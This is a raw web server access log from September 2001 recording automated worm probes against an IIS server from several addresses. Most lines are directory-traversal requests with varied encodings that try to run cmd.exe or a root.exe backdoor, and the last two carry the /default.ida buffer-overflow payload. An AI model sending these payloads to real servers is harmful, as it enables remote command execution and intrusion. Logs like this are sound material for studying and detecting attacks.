20010925 22:04:05:  [38.144.155.36] "GET /scripts/root.exe?/c+dir HTTP/1.0"
20010925 22:07:06:  [38.144.155.36] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
20010925 22:07:08:  [38.144.155.36] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:09:  [38.144.155.36] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:11:  [38.144.155.36] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:13:  [38.144.155.36] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:15:  [38.144.155.36] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:16:  [38.144.155.36] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:17:  [38.144.155.36] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:17:  [38.144.155.36] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:19:  [38.144.155.36] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:20:  [38.144.155.36] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:20:  [38.144.155.36] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:21:  [38.144.155.36] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:22:  [38.144.155.36] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:23:  [38.144.155.36] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:07:24: idenhq.com [208.60.21.7] "GET /scripts/root.exe?/c+dir HTTP/1.0"
20010925 22:27:59: idenhq.com [208.60.21.7] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
20010925 22:28:03: idenhq.com [208.60.21.7] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:04: idenhq.com [208.60.21.7] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:09: idenhq.com [208.60.21.7] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:10: idenhq.com [208.60.21.7] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:10: idenhq.com [208.60.21.7] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:11: idenhq.com [208.60.21.7] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:12: idenhq.com [208.60.21.7] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:13: idenhq.com [208.60.21.7] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:14: idenhq.com [208.60.21.7] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:14: idenhq.com [208.60.21.7] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:18: idenhq.com [208.60.21.7] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:19: idenhq.com [208.60.21.7] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:20: idenhq.com [208.60.21.7] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:21: idenhq.com [208.60.21.7] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
20010925 22:28:21: dialup-ccts5-100.cc.columbia.edu [128.59.6.109] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0"
20010925 22:57:28:  [61.154.12.110] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0"